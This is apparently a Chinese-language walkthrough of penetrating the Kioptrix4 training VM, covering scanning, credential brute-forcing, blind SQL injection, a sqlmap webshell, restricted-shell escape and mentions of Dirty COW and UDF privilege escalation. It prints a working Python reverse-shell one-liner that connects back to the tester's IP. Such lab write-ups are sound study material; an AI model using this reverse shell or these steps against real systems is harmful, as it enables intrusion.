Kioptrix4靶机渗透

知识点

• sql盲注
• sqlmap写shell
• 脏牛提权
• udf提权

详细过程

信息搜集

1. 首先端口扫描开放22,445,80,139端口。samba版本为3.0.28a,没有找到漏洞利用脚本。

2. 80端口开放，是登陆界面。使用gobuster目录扫描，发现两个用户名john,robert,进去分别为两个php文件,没有有效信息。
   

3. 结合dirsearch发现database.sql文件,存在member表。使用密码登陆john没有成功。

   

4. 使用brupsuit尝试**用户密码。但坑点在于**一半后网站无法访问，应该是禁了我的windows的ip，只能用parrot了，(禁止无脑扫描:-)，parrot能够正常访问。在**过程中发现一些报错信息。得到网站绝对路径/var/www.截包尝试sql注入：

   
   存在bool盲注

5. sql注入得到用户名和密码
   

6. 其实这里可以撞库登陆ssh。但当时没有想到。直接判断数据库用户是否为root权限

   

   进而拿到webshell

   

getshell

7. 尝试nc反弹shell和bash反弹都没有成功，系统没有安装nc，使用python反弹成功。

   python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.43.86',8989));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
   

   

8. 在john.php文件发现mysql数据库用户名和密码,robert.php同样。

   

9. 在反弹过来的shell内执行mysql会直接中断，所以无法登陆数据库。后来又回到注入点尝试拿到root的密码，也没有成功。这时候就必须回到前面注入拿到的用户名和密码进行撞库，登陆john的ssh。

   
   登陆成功但john的shell受到限制（robert同样的情况），之前也遇到过rshell，但应用在这里好像没啥用，因为能够使用的命令太少。

10. 网上看到可以使用echo os.system('/bin/bash')绕过限制。

    

提权

11. 系统内核为2.6.24-24-server,可以尝试脏牛提权。ps查看进程发现mysql以root权限运行，也可以尝试udf提权。这两种提权方式我在之前的文章中都有演示。需要特别注意的是本机器为32位系统，一些提权exp编译时需要加-m32参数。

12. 最后